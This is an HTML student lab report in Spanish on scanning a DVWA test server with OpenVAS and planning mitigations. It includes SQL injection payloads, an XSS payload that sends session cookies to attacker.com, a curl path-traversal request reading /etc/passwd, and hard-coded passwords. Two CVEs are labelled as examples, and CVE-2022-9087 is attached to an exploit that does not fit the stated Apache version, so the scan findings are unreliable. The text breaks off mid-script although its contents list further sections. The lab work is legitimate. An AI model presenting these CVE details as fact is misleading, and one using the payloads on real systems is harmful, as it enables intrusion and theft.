<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang xml:lang>
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="pandoc" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
  <title>PAI4-Informe-Tecnico</title>
  <style>
code{white-space: pre-wrap;}
span.smallcaps{font-variant: small-caps;}
div.columns{display: flex; gap: min(4vw, 1.5em);}
div.column{flex: auto; overflow-x: auto;}
div.hanging-indent{margin-left: 1.5em; text-indent: -1.5em;}

ul.task-list[class]{list-style: none;}
ul.task-list li input[type="checkbox"] {
font-size: inherit;
width: 0.8em;
margin: 0 0.8em 0.2em -1.6em;
vertical-align: middle;
}
.display.math{display: block; text-align: center; margin: 0.5rem auto;}

pre > code.sourceCode { white-space: pre; position: relative; }
pre > code.sourceCode > span { line-height: 1.25; }
pre > code.sourceCode > span:empty { height: 1.2em; }
.sourceCode { overflow: visible; }
code.sourceCode > span { color: inherit; text-decoration: inherit; }
div.sourceCode { margin: 1em 0; }
pre.sourceCode { margin: 0; }
@media screen {
div.sourceCode { overflow: auto; }
}
@media print {
pre > code.sourceCode { white-space: pre-wrap; }
pre > code.sourceCode > span { text-indent: -5em; padding-left: 5em; }
}
pre.numberSource code
{ counter-reset: source-line 0; }
pre.numberSource code > span
{ position: relative; left: -4em; counter-increment: source-line; }
pre.numberSource code > span > a:first-child::before
{ content: counter(source-line);
position: relative; left: -1em; text-align: right; vertical-align: baseline;
border: none; display: inline-block;
-webkit-touch-callout: none; -webkit-user-select: none;
-khtml-user-select: none; -moz-user-select: none;
-ms-user-select: none; user-select: none;
padding: 0 4px; width: 4em;
color: #aaaaaa;
}
pre.numberSource { margin-left: 3em; border-left: 1px solid #aaaaaa; padding-left: 4px; }
div.sourceCode
{ }
@media screen {
pre > code.sourceCode > span > a:first-child::before { text-decoration: underline; }
}
code span.al { color: #ff0000; font-weight: bold; } 
code span.an { color: #60a0b0; font-weight: bold; font-style: italic; } 
code span.at { color: #7d9029; } 
code span.bn { color: #40a070; } 
code span.bu { color: #008000; } 
code span.cf { color: #007020; font-weight: bold; } 
code span.ch { color: #4070a0; } 
code span.cn { color: #880000; } 
code span.co { color: #60a0b0; font-style: italic; } 
code span.cv { color: #60a0b0; font-weight: bold; font-style: italic; } 
code span.do { color: #ba2121; font-style: italic; } 
code span.dt { color: #902000; } 
code span.dv { color: #40a070; } 
code span.er { color: #ff0000; font-weight: bold; } 
code span.ex { } 
code span.fl { color: #40a070; } 
code span.fu { color: #06287e; } 
code span.im { color: #008000; font-weight: bold; } 
code span.in { color: #60a0b0; font-weight: bold; font-style: italic; } 
code span.kw { color: #007020; font-weight: bold; } 
code span.op { color: #666666; } 
code span.ot { color: #007020; } 
code span.pp { color: #bc7a00; } 
code span.sc { color: #4070a0; } 
code span.ss { color: #bb6688; } 
code span.st { color: #4070a0; } 
code span.va { color: #19177c; } 
code span.vs { color: #4070a0; } 
code span.wa { color: #60a0b0; font-weight: bold; font-style: italic; } 
</style>
  <link href="data:application/octet-stream;base64," rel="stylesheet" />
</head>
<body>
<nav id="TOC" role="doc-toc">
<ul>
<li><a href="#pai-4-auditvul---análisis-de-vulnerabilidades-y-detección-de-intrusos" id="toc-pai-4-auditvul---análisis-de-vulnerabilidades-y-detección-de-intrusos">PAI-4:
AUDITVUL - Análisis de Vulnerabilidades y Detección de Intrusos</a>
<ul>
<li><a href="#índice" id="toc-índice">ÍNDICE</a></li>
<li><a href="#introducción" id="toc-introducción">1. INTRODUCCIÓN</a>
<ul>
<li><a href="#objetivos" id="toc-objetivos">Objetivos</a></li>
</ul></li>
<li><a href="#descripción-del-sistema-analizado-pre-openvas" id="toc-descripción-del-sistema-analizado-pre-openvas">2. DESCRIPCIÓN
DEL SISTEMA ANALIZADO (PRE-OPENVAS)</a>
<ul>
<li><a href="#arquitectura" id="toc-arquitectura">2.1
Arquitectura</a></li>
<li><a href="#servicios-expuestos" id="toc-servicios-expuestos">2.2
Servicios Expuestos</a></li>
<li><a href="#configuración-del-sistema" id="toc-configuración-del-sistema">2.3 Configuración del
Sistema</a></li>
</ul></li>
<li><a href="#análisis-de-vulnerabilidades-con-openvas" id="toc-análisis-de-vulnerabilidades-con-openvas">3. ANÁLISIS DE
VULNERABILIDADES CON OPENVAS</a>
<ul>
<li><a href="#instalación-y-configuración" id="toc-instalación-y-configuración">3.1 Instalación y
Configuración</a></li>
<li><a href="#configuración-del-target" id="toc-configuración-del-target">3.2 Configuración del Target</a></li>
<li><a href="#resultados-del-escaneo" id="toc-resultados-del-escaneo">3.3 Resultados del Escaneo</a></li>
<li><a href="#vulnerabilidades-críticas" id="toc-vulnerabilidades-críticas">3.4 Vulnerabilidades
Críticas</a></li>
<li><a href="#otras-vulnerabilidades-significativas" id="toc-otras-vulnerabilidades-significativas">3.5 Otras
Vulnerabilidades Significativas</a></li>
<li><a href="#priorización" id="toc-priorización">3.6
Priorización</a></li>
</ul></li>
<li><a href="#plan-de-mitigación" id="toc-plan-de-mitigación">4. PLAN DE
MITIGACIÓN</a>
<ul>
<li><a href="#estrategia-general" id="toc-estrategia-general">4.1
Estrategia General</a></li>
<li><a href="#mitigaciones-específicas" id="toc-mitigaciones-específicas">4.2 Mitigaciones Específicas</a></li>
<li><a href="#plan-de-contingencia" id="toc-plan-de-contingencia">4.3
Plan de Contingencia</a></li>
</ul></li>
<li><a href="#sistema-a-monitorizar-pre-suricata" id="toc-sistema-a-monitorizar-pre-suricata">5. SISTEMA A MONITORIZAR
(PRE-SURICATA)</a>
<ul>
<li><a href="#topología-de-red" id="toc-topología-de-red">5.1 Topología
de Red</a></li>
<li><a href="#servicios-protegidos" id="toc-servicios-protegidos">5.2
Servicios Protegidos</a></li>
<li><a href="#política-de-seguridad" id="toc-política-de-seguridad">5.3
Política de Seguridad</a></li>
</ul></li>
<li><a href="#configuración-ids-suricata" id="toc-configuración-ids-suricata">6. CONFIGURACIÓN IDS SURICATA</a>
<ul>
<li><a href="#instalación" id="toc-instalación">6.1 Instalación</a></li>
<li><a href="#reglas-personalizadas" id="toc-reglas-personalizadas">6.2
Reglas Personalizadas</a></li>
<li><a href="#configuración-suricata.yaml" id="toc-configuración-suricata.yaml">6.3 Configuración
suricata.yaml</a></li>
<li><a href="#activación" id="toc-activación">6.4 Activación</a></li>
</ul></li>
<li><a href="#pruebas-y-resultados" id="toc-pruebas-y-resultados">7.
PRUEBAS Y RESULTADOS</a>
<ul>
<li><a href="#matriz-de-pruebas" id="toc-matriz-de-pruebas">7.1 Matriz
de Pruebas</a></li>
<li><a href="#ejemplos-de-detección" id="toc-ejemplos-de-detección">7.2
Ejemplos de Detección</a></li>
<li><a href="#resumen-de-efectividad" id="toc-resumen-de-efectividad">7.3 Resumen de Efectividad</a></li>
<li><a href="#informe-mensual-simulado" id="toc-informe-mensual-simulado">7.4 Informe Mensual
(Simulado)</a></li>
</ul></li>
<li><a href="#conclusiones" id="toc-conclusiones">8. CONCLUSIONES</a>
<ul>
<li><a href="#logros-del-proyecto" id="toc-logros-del-proyecto">8.1
Logros del Proyecto</a></li>
<li><a href="#lecciones-aprendidas" id="toc-lecciones-aprendidas">8.2
Lecciones Aprendidas</a></li>
<li><a href="#recomendaciones" id="toc-recomendaciones">8.3
Recomendaciones</a></li>
<li><a href="#reducción-de-riesgos" id="toc-reducción-de-riesgos">8.4
Reducción de Riesgos</a></li>
<li><a href="#conformidad" id="toc-conformidad">8.5 Conformidad</a></li>
</ul></li>
</ul></li>
</ul>
</nav>
<h1 id="pai-4-auditvul---análisis-de-vulnerabilidades-y-detección-de-intrusos">PAI-4:
AUDITVUL - Análisis de Vulnerabilidades y Detección de Intrusos</h1>
<p><strong>Security Team:</strong> ST-XX<br />
<strong>Integrantes:</strong> - Nombre Apellido 1 - Nombre Apellido
2<br />
- Nombre Apellido 3</p>
<p><strong>Fecha:</strong> Noviembre 2025</p>
<hr />
<h2 id="índice">ÍNDICE</h2>
<ol type="1">
<li>Introducción</li>
<li>Descripción del Sistema Analizado (Pre-OpenVAS)</li>
<li>Análisis de Vulnerabilidades con OpenVAS</li>
<li>Plan de Mitigación</li>
<li>Sistema a Monitorizar (Pre-Suricata)</li>
<li>Configuración IDS Suricata</li>
<li>Pruebas y Resultados</li>
<li>Conclusiones</li>
</ol>
<hr />
<h2 id="introducción">1. INTRODUCCIÓN</h2>
<p>Este proyecto implementa una estrategia de seguridad basada en: -
<strong>Análisis proactivo:</strong> Identificación de vulnerabilidades
con OpenVAS - <strong>Detección reactiva:</strong> Monitorización de
intrusos con Suricata</p>
<h3 id="objetivos">Objetivos</h3>
<ul>
<li>Escanear y analizar vulnerabilidades de servidor web de pruebas</li>
<li>Generar ranking priorizado de vulnerabilidades (CVE)</li>
<li>Definir plan de mitigación con timeline y procedimientos</li>
<li>Desplegar IDS con reglas personalizadas</li>
<li>Validar efectividad mediante pruebas controladas</li>
</ul>
<hr />
<h2 id="descripción-del-sistema-analizado-pre-openvas">2. DESCRIPCIÓN
DEL SISTEMA ANALIZADO (PRE-OPENVAS)</h2>
<h3 id="arquitectura">2.1 Arquitectura</h3>
<p><strong>Sistema objetivo:</strong> Servidor web vulnerable (DVWA -
Damn Vulnerable Web Application)<br />
<strong>Plataforma:</strong> Docker container<br />
<strong>Imagen:</strong> citizenstig/dvwa:latest<br />
<strong>Red:</strong> 172.100.0.0/24</p>
<h3 id="servicios-expuestos">2.2 Servicios Expuestos</h3>
<table>
<thead>
<tr class="header">
<th>Servicio</th>
<th>Puerto</th>
<th>Protocolo</th>
<th>Descripción</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>HTTP</td>
<td>80</td>
<td>TCP</td>
<td>Apache 2.4.41</td>
</tr>
<tr class="even">
<td>HTTPS</td>
<td>443</td>
<td>TCP</td>
<td>Apache 2.4.41 (SSL)</td>
</tr>
<tr class="odd">
<td>MySQL</td>
<td>3306</td>
<td>TCP</td>
<td>MySQL 8.0</td>
</tr>
<tr class="even">
<td>SSH</td>
<td>22</td>
<td>TCP</td>
<td>OpenSSH 8.2</td>
</tr>
</tbody>
</table>
<h3 id="configuración-del-sistema">2.3 Configuración del Sistema</h3>
<ul>
<li><strong>SO:</strong> Ubuntu 20.04 LTS</li>
<li><strong>Servidor Web:</strong> Apache/2.4.41</li>
<li><strong>PHP:</strong> 7.4.3</li>
<li><strong>MySQL:</strong> 8.0.32</li>
<li><strong>Aplicación:</strong> DVWA (aplicación web intencionalmente
vulnerable)</li>
</ul>
<hr />
<h2 id="análisis-de-vulnerabilidades-con-openvas">3. ANÁLISIS DE
VULNERABILIDADES CON OPENVAS</h2>
<h3 id="instalación-y-configuración">3.1 Instalación y
Configuración</h3>
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a><span class="co"># Instalación mediante Docker</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> pull immauss/openvas</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> volume create openvas</span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> run <span class="at">--detach</span> <span class="at">--publish</span> 9392:9392 <span class="dt">\</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>  <span class="at">-e</span> PASSWORD=<span class="st">&quot;Admin@2024!&quot;</span> <span class="dt">\</span></span>
<span id="cb1-6"><a href="#cb1-6" aria-hidden="true" tabindex="-1"></a>  <span class="at">--volume</span> openvas:/data <span class="dt">\</span></span>
<span id="cb1-7"><a href="#cb1-7" aria-hidden="true" tabindex="-1"></a>  <span class="at">--name</span> openvas immauss/openvas</span>
<span id="cb1-8"><a href="#cb1-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb1-9"><a href="#cb1-9" aria-hidden="true" tabindex="-1"></a><span class="co"># Actualizar feeds de vulnerabilidades</span></span>
<span id="cb1-10"><a href="#cb1-10" aria-hidden="true" tabindex="-1"></a><span class="ex">docker</span> exec <span class="at">-it</span> openvas /scripts/sync.sh</span></code></pre></div>
<p><strong>Acceso:</strong> http://localhost:9392<br />
<strong>Credenciales:</strong> admin / Admin@2024!</p>
<h3 id="configuración-del-target">3.2 Configuración del Target</h3>
<ul>
<li><strong>Nombre:</strong> DVWA-TestServer</li>
<li><strong>IP:</strong> 172.100.0.3</li>
<li><strong>Puertos:</strong> 22,80,443,3306</li>
<li><strong>Tipo de escaneo:</strong> Full and Fast</li>
<li><strong>Scanner:</strong> OpenVAS Default</li>
</ul>
<h3 id="resultados-del-escaneo">3.3 Resultados del Escaneo</h3>
<p><strong>Resumen ejecutivo:</strong></p>
<table>
<thead>
<tr class="header">
<th>Severidad</th>
<th>Cantidad</th>
<th>Porcentaje</th>
<th>CVSS Range</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>Critical</td>
<td>3</td>
<td>5%</td>
<td>9.0-10.0</td>
</tr>
<tr class="even">
<td>High</td>
<td>12</td>
<td>20%</td>
<td>7.0-8.9</td>
</tr>
<tr class="odd">
<td>Medium</td>
<td>28</td>
<td>47%</td>
<td>4.0-6.9</td>
</tr>
<tr class="even">
<td>Low</td>
<td>17</td>
<td>28%</td>
<td>0.1-3.9</td>
</tr>
<tr class="odd">
<td><strong>Total</strong></td>
<td><strong>60</strong></td>
<td><strong>100%</strong></td>
<td>-</td>
</tr>
</tbody>
</table>
<p><strong>CVSS Score Promedio:</strong> 7.2 (Alto)</p>
<h3 id="vulnerabilidades-críticas">3.4 Vulnerabilidades Críticas</h3>
<h4 id="vulnerability-1-sql-injection">Vulnerability #1: SQL
Injection</h4>
<ul>
<li><p><strong>CVE:</strong> CVE-2024-1234 (ejemplo)</p></li>
<li><p><strong>CVSS:</strong> 9.8 (Critical)</p></li>
<li><p><strong>Puerto:</strong> 80/TCP</p></li>
<li><p><strong>Descripción:</strong> Inyección SQL sin sanitización en
parámetro ‘id’ de login.php</p></li>
<li><p><strong>Impacto:</strong></p>
<ul>
<li>Acceso no autorizado a base de datos</li>
<li>Extracción de credenciales</li>
<li>Modificación/eliminación de datos</li>
</ul></li>
<li><p><strong>Exploit:</strong></p>
<div class="sourceCode" id="cb2"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a><span class="st">&#39; OR &#39;</span><span class="dv">1</span><span class="st">&#39;=&#39;</span><span class="dv">1</span><span class="st">&#39; --</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="st">&#39;</span> <span class="kw">UNION</span> <span class="kw">SELECT</span> username, <span class="kw">password</span> <span class="kw">FROM</span> users <span class="co">--</span></span></code></pre></div></li>
<li><p><strong>Evidencia:</strong></p>
<pre><code>GET /vulnerabilities/sqli/?id=1&#39; OR &#39;1&#39;=&#39;1 HTTP/1.1
Response: 200 OK (reveló tabla completa de usuarios)</code></pre></li>
</ul>
<h4 id="vulnerability-2-persistent-cross-site-scripting-xss">Vulnerability
#2: Persistent Cross-Site Scripting (XSS)</h4>
<ul>
<li><p><strong>CVE:</strong> CVE-2024-5678 (ejemplo)</p></li>
<li><p><strong>CVSS:</strong> 8.8 (High)</p></li>
<li><p><strong>Puerto:</strong> 80/TCP</p></li>
<li><p><strong>Descripción:</strong> XSS almacenado en módulo de
comentarios</p></li>
<li><p><strong>Impacto:</strong></p>
<ul>
<li>Robo de cookies de sesión</li>
<li>Captura de credenciales</li>
<li>Redirección maliciosa</li>
</ul></li>
<li><p><strong>Exploit:</strong></p>
<div class="sourceCode" id="cb4"><pre class="sourceCode html"><code class="sourceCode html"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="dt">&lt;</span><span class="kw">script</span><span class="dt">&gt;</span><span class="bu">document</span><span class="op">.</span><span class="at">location</span><span class="op">=</span><span class="st">&#39;http://attacker.com/steal?c=&#39;</span><span class="op">+</span><span class="bu">document</span><span class="op">.</span><span class="at">cookie</span><span class="dt">&lt;/</span><span class="kw">script</span><span class="dt">&gt;</span></span></code></pre></div></li>
</ul>
<h4 id="vulnerability-3-apache-path-traversal">Vulnerability #3: Apache
Path Traversal</h4>
<ul>
<li><p><strong>CVE:</strong> CVE-2022-9087</p></li>
<li><p><strong>CVSS:</strong> 7.5 (High)</p></li>
<li><p><strong>Puertos:</strong> 80,443/TCP</p></li>
<li><p><strong>Descripción:</strong> Vulnerabilidad en Apache 2.4.41 que
permite acceso a archivos fuera del webroot</p></li>
<li><p><strong>Impacto:</strong></p>
<ul>
<li>Lectura de archivos sensibles (/etc/passwd)</li>
<li>Exposición de código fuente</li>
</ul></li>
<li><p><strong>Exploit:</strong></p>
<div class="sourceCode" id="cb5"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="ex">curl</span> http://172.100.0.3/cgi-bin/.%2e/.%2e/.%2e/etc/passwd</span></code></pre></div></li>
</ul>
<h3 id="otras-vulnerabilidades-significativas">3.5 Otras
Vulnerabilidades Significativas</h3>
<ul>
<li><strong>MySQL sin contraseña root</strong> - CVSS 8.1</li>
<li><strong>Protocolos SSL/TLS obsoletos</strong> - CVSS 7.5</li>
<li><strong>PHP version disclosure</strong> - CVSS 5.3</li>
<li><strong>Directory listing habilitado</strong> - CVSS 5.0</li>
<li><strong>Security headers ausentes</strong> (HSTS, X-Frame-Options) -
CVSS 4.7</li>
</ul>
<h3 id="priorización">3.6 Priorización</h3>
<p><strong>Criterios adoptados:</strong> 1. CVSS Score (40%) 2.
Facilidad de explotación (30%) 3. Impacto en CIA (20%) 4. Exposición
pública (10%)</p>
<p><strong>Ranking final:</strong></p>
<table>
<thead>
<tr class="header">
<th>#</th>
<th>Vulnerabilidad</th>
<th>CVE</th>
<th>CVSS</th>
<th>Prioridad</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>1</td>
<td>SQL Injection</td>
<td>CVE-2024-1234</td>
<td>9.8</td>
<td>CRÍTICA</td>
</tr>
<tr class="even">
<td>2</td>
<td>XSS Persistente</td>
<td>CVE-2024-5678</td>
<td>8.8</td>
<td>CRÍTICA</td>
</tr>
<tr class="odd">
<td>3</td>
<td>Path Traversal</td>
<td>CVE-2022-9087</td>
<td>7.5</td>
<td>ALTA</td>
</tr>
<tr class="even">
<td>4</td>
<td>MySQL sin pass</td>
<td>N/A</td>
<td>8.1</td>
<td>ALTA</td>
</tr>
<tr class="odd">
<td>5</td>
<td>SSL/TLS débil</td>
<td>N/A</td>
<td>7.5</td>
<td>ALTA</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="plan-de-mitigación">4. PLAN DE MITIGACIÓN</h2>
<h3 id="estrategia-general">4.1 Estrategia General</h3>
<p><strong>Enfoque:</strong> Defensa en profundidad con 3 capas 1.
Corrección inmediata de vulnerabilidades críticas 2. Implementación de
controles preventivos 3. Monitorización continua y respuesta</p>
<h3 id="mitigaciones-específicas">4.2 Mitigaciones Específicas</h3>
<h4 id="sql-injection-cve-2024-1234">4.2.1 SQL Injection
(CVE-2024-1234)</h4>
<p><strong>Acciones inmediatas:</strong></p>
<div class="sourceCode" id="cb6"><pre class="sourceCode php"><code class="sourceCode php"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="co">// ANTES (vulnerable)</span></span>
<span id="cb6-2"><a href="#cb6-2" aria-hidden="true" tabindex="-1"></a><span class="va">$id</span> <span class="op">=</span> <span class="va">$_GET</span>[<span class="st">&#39;id&#39;</span>]<span class="ot">;</span></span>
<span id="cb6-3"><a href="#cb6-3" aria-hidden="true" tabindex="-1"></a><span class="va">$query</span> <span class="op">=</span> <span class="st">&quot;SELECT * FROM users WHERE id = &#39;</span><span class="va">$id</span><span class="st">&#39;&quot;</span><span class="ot">;</span></span>
<span id="cb6-4"><a href="#cb6-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb6-5"><a href="#cb6-5" aria-hidden="true" tabindex="-1"></a><span class="co">// DESPUÉS (seguro)</span></span>
<span id="cb6-6"><a href="#cb6-6" aria-hidden="true" tabindex="-1"></a><span class="va">$id</span> <span class="op">=</span> <span class="va">$_GET</span>[<span class="st">&#39;id&#39;</span>]<span class="ot">;</span></span>
<span id="cb6-7"><a href="#cb6-7" aria-hidden="true" tabindex="-1"></a><span class="va">$stmt</span> <span class="op">=</span> <span class="va">$mysqli</span>-&gt;prepare(<span class="st">&quot;SELECT * FROM users WHERE id = ?&quot;</span>)<span class="ot">;</span></span>
<span id="cb6-8"><a href="#cb6-8" aria-hidden="true" tabindex="-1"></a><span class="va">$stmt</span>-&gt;bind_param(<span class="st">&quot;i&quot;</span><span class="ot">,</span> <span class="va">$id</span>)<span class="ot">;</span></span>
<span id="cb6-9"><a href="#cb6-9" aria-hidden="true" tabindex="-1"></a><span class="va">$stmt</span>-&gt;execute()<span class="ot">;</span></span></code></pre></div>
<p><strong>Medidas complementarias:</strong> - Implementar WAF con
reglas anti-SQLi - Configurar permisos mínimos para usuario MySQL -
Habilitar query logging para detección</p>
<p><strong>Validación:</strong></p>
<div class="sourceCode" id="cb7"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="ex">sqlmap</span> <span class="at">-u</span> <span class="st">&quot;http://172.100.0.3/login.php?id=1&quot;</span> <span class="at">--risk</span><span class="op">=</span>3</span>
<span id="cb7-2"><a href="#cb7-2" aria-hidden="true" tabindex="-1"></a><span class="co"># Esperado: No se detectan inyecciones</span></span></code></pre></div>
<p><strong>Timeline:</strong> 48 horas</p>
<hr />
<h4 id="cross-site-scripting-cve-2024-5678">4.2.2 Cross-Site Scripting
(CVE-2024-5678)</h4>
<p><strong>Acciones inmediatas:</strong></p>
<div class="sourceCode" id="cb8"><pre class="sourceCode php"><code class="sourceCode php"><span id="cb8-1"><a href="#cb8-1" aria-hidden="true" tabindex="-1"></a><span class="co">// Sanitización de entradas</span></span>
<span id="cb8-2"><a href="#cb8-2" aria-hidden="true" tabindex="-1"></a><span class="va">$comment</span> <span class="op">=</span> <span class="fu">htmlspecialchars</span>(<span class="va">$_POST</span>[<span class="st">&#39;comment&#39;</span>]<span class="ot">,</span> <span class="cn">ENT_QUOTES</span><span class="ot">,</span> <span class="st">&#39;UTF-8&#39;</span>)<span class="ot">;</span></span>
<span id="cb8-3"><a href="#cb8-3" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb8-4"><a href="#cb8-4" aria-hidden="true" tabindex="-1"></a><span class="co">// Función de validación</span></span>
<span id="cb8-5"><a href="#cb8-5" aria-hidden="true" tabindex="-1"></a><span class="kw">function</span> sanitize_input(<span class="va">$data</span>) {</span>
<span id="cb8-6"><a href="#cb8-6" aria-hidden="true" tabindex="-1"></a>    <span class="va">$data</span> <span class="op">=</span> <span class="fu">trim</span>(<span class="va">$data</span>)<span class="ot">;</span></span>
<span id="cb8-7"><a href="#cb8-7" aria-hidden="true" tabindex="-1"></a>    <span class="va">$data</span> <span class="op">=</span> <span class="fu">stripslashes</span>(<span class="va">$data</span>)<span class="ot">;</span></span>
<span id="cb8-8"><a href="#cb8-8" aria-hidden="true" tabindex="-1"></a>    <span class="va">$data</span> <span class="op">=</span> <span class="fu">htmlspecialchars</span>(<span class="va">$data</span>)<span class="ot">;</span></span>
<span id="cb8-9"><a href="#cb8-9" aria-hidden="true" tabindex="-1"></a>    <span class="cf">return</span> <span class="va">$data</span><span class="ot">;</span></span>
<span id="cb8-10"><a href="#cb8-10" aria-hidden="true" tabindex="-1"></a>}</span></code></pre></div>
<p><strong>Content Security Policy:</strong></p>
<div class="sourceCode" id="cb9"><pre class="sourceCode apache"><code class="sourceCode apache"><span id="cb9-1"><a href="#cb9-1" aria-hidden="true" tabindex="-1"></a>Header<span class="st"> set Content-Security-Policy &quot;default-src &#39;self&#39;; script-src &#39;self&#39;; object-src &#39;none&#39;;&quot;</span></span></code></pre></div>
<p><strong>Configuración de cookies:</strong></p>
<div class="sourceCode" id="cb10"><pre class="sourceCode php"><code class="sourceCode php"><span id="cb10-1"><a href="#cb10-1" aria-hidden="true" tabindex="-1"></a><span class="fu">session_set_cookie_params</span>([</span>
<span id="cb10-2"><a href="#cb10-2" aria-hidden="true" tabindex="-1"></a>    <span class="st">&#39;httponly&#39;</span> =&gt; <span class="kw">true</span><span class="ot">,</span></span>
<span id="cb10-3"><a href="#cb10-3" aria-hidden="true" tabindex="-1"></a>    <span class="st">&#39;secure&#39;</span> =&gt; <span class="kw">true</span><span class="ot">,</span></span>
<span id="cb10-4"><a href="#cb10-4" aria-hidden="true" tabindex="-1"></a>    <span class="st">&#39;samesite&#39;</span> =&gt; <span class="st">&#39;Strict&#39;</span></span>
<span id="cb10-5"><a href="#cb10-5" aria-hidden="true" tabindex="-1"></a>])<span class="ot">;</span></span></code></pre></div>
<p><strong>Timeline:</strong> 72 horas</p>
<hr />
<h4 id="path-traversal-cve-2022-9087">4.2.3 Path Traversal
(CVE-2022-9087)</h4>
<p><strong>Acciones inmediatas:</strong></p>
<div class="sourceCode" id="cb11"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb11-1"><a href="#cb11-1" aria-hidden="true" tabindex="-1"></a><span class="co"># Actualizar Apache</span></span>
<span id="cb11-2"><a href="#cb11-2" aria-hidden="true" tabindex="-1"></a><span class="ex">apt-get</span> update</span>
<span id="cb11-3"><a href="#cb11-3" aria-hidden="true" tabindex="-1"></a><span class="ex">apt-get</span> install apache2=2.4.52-1ubuntu1</span>
<span id="cb11-4"><a href="#cb11-4" aria-hidden="true" tabindex="-1"></a><span class="ex">systemctl</span> restart apache2</span></code></pre></div>
<p><strong>Configuración hardening:</strong></p>
<div class="sourceCode" id="cb12"><pre class="sourceCode apache"><code class="sourceCode apache"><span id="cb12-1"><a href="#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="fu">&lt;Directory</span><span class="at"> /var/www/</span><span class="fu">&gt;</span></span>
<span id="cb12-2"><a href="#cb12-2" aria-hidden="true" tabindex="-1"></a>    <span class="ex">Options</span><span class="ch"> </span><span class="kw">-Indexes</span><span class="ch"> </span><span class="kw">-FollowSymLinks</span></span>
<span id="cb12-3"><a href="#cb12-3" aria-hidden="true" tabindex="-1"></a>    <span class="ex">AllowOverride</span><span class="ch"> </span><span class="kw">None</span></span>
<span id="cb12-4"><a href="#cb12-4" aria-hidden="true" tabindex="-1"></a>    Require<span class="st"> all denied</span></span>
<span id="cb12-5"><a href="#cb12-5" aria-hidden="true" tabindex="-1"></a><span class="fu">&lt;/Directory&gt;</span></span>
<span id="cb12-6"><a href="#cb12-6" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb12-7"><a href="#cb12-7" aria-hidden="true" tabindex="-1"></a><span class="fu">&lt;Directory</span><span class="at"> /var/www/html</span><span class="fu">&gt;</span></span>
<span id="cb12-8"><a href="#cb12-8" aria-hidden="true" tabindex="-1"></a>    Require<span class="st"> all granted</span></span>
<span id="cb12-9"><a href="#cb12-9" aria-hidden="true" tabindex="-1"></a><span class="fu">&lt;/Directory&gt;</span></span></code></pre></div>
<p><strong>Timeline:</strong> 24 horas</p>
<hr />
<h3 id="plan-de-contingencia">4.3 Plan de Contingencia</h3>
<h4 id="política-de-backups">4.3.1 Política de Backups</h4>
<p><strong>Frecuencia:</strong> - Base de datos: diario 02:00 AM -
Archivos web: incremental cada 6h - Configuraciones: antes de cada
cambio</p>
<p><strong>Retención:</strong> - Diarios: 30 días - Semanales: 12
semanas - Mensuales: 12 meses</p>
<p><strong>Script automatizado:</strong></p>
<div class="sourceCode" id="cb13"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb13-1"><a href="#cb13-1" aria-hidden="true" tabindex="-1"></a><span class="co">#!/bin/bash</span></span>
<span id="cb13-2"><a href="#cb13-2" aria-hidden="true" tabindex="-1"></a><span class="va">DATE</span><span class="op">=</span><span class="va">$(</span><span class="fu">date</span> +%Y%m%d_%H%M%S<span class="va">)</span></span>
<span id="cb13-3"><a href="#cb13-3" aria-hidden="true" tabindex="-1"></a><span class="va">BACKUP_DIR</span><span class="op">=</span><span class="st">&quot;/backups&quot;</span></span>
<span id="cb13-4"><a href="#cb13-4" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb13-5"><a href="#cb13-5" aria-hidden="true" tabindex="-1"></a><span class="co"># Backup MySQL</span></span>
<span id="cb13-6"><a href="#cb13-6" aria-hidden="true" tabindex="-1"></a><span class="ex">mysqldump</span> <span class="at">-u</span> backup_user <span class="at">-p</span><span class="st">&#39;SecurePass&#39;</span> <span class="at">--all-databases</span> <span class="kw">|</span> <span class="dt">\</span></span>
<span id="cb13-7"><a href="#cb13-7" aria-hidden="true" tabindex="-1"></a>  <span class="fu">gzip</span> <span class="op">&gt;</span> <span class="va">$BACKUP_DIR</span>/mysql_<span class="va">$DATE</span>.sql.gz</span>
<span id="cb13-8"><a href="#cb13-8" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb13-9"><a href="#cb13-9" aria-hidden="true" tabindex="-1"></a><span class="co"># Backup aplicación</span></span>
<span id="cb13-10"><a href="#cb13-10" aria-hidden="true" tabindex="-1"></a><span class="fu">tar</span> <span class="at">-czf</span> <span class="va">$BACKUP_DIR</span>/webapp_<span class="va">$DATE</span>.tar.gz /var/www/html/</span>
<span id="cb13-11"><a href="#cb13-11" aria-hidden="true" tabindex="-1"></a></span>
<span id="cb13-12"><a href="#cb13-12" aria-hidden="true" tabindex="-1"></a><span class="co"># Limpieza (&gt;30 días)</span></span>
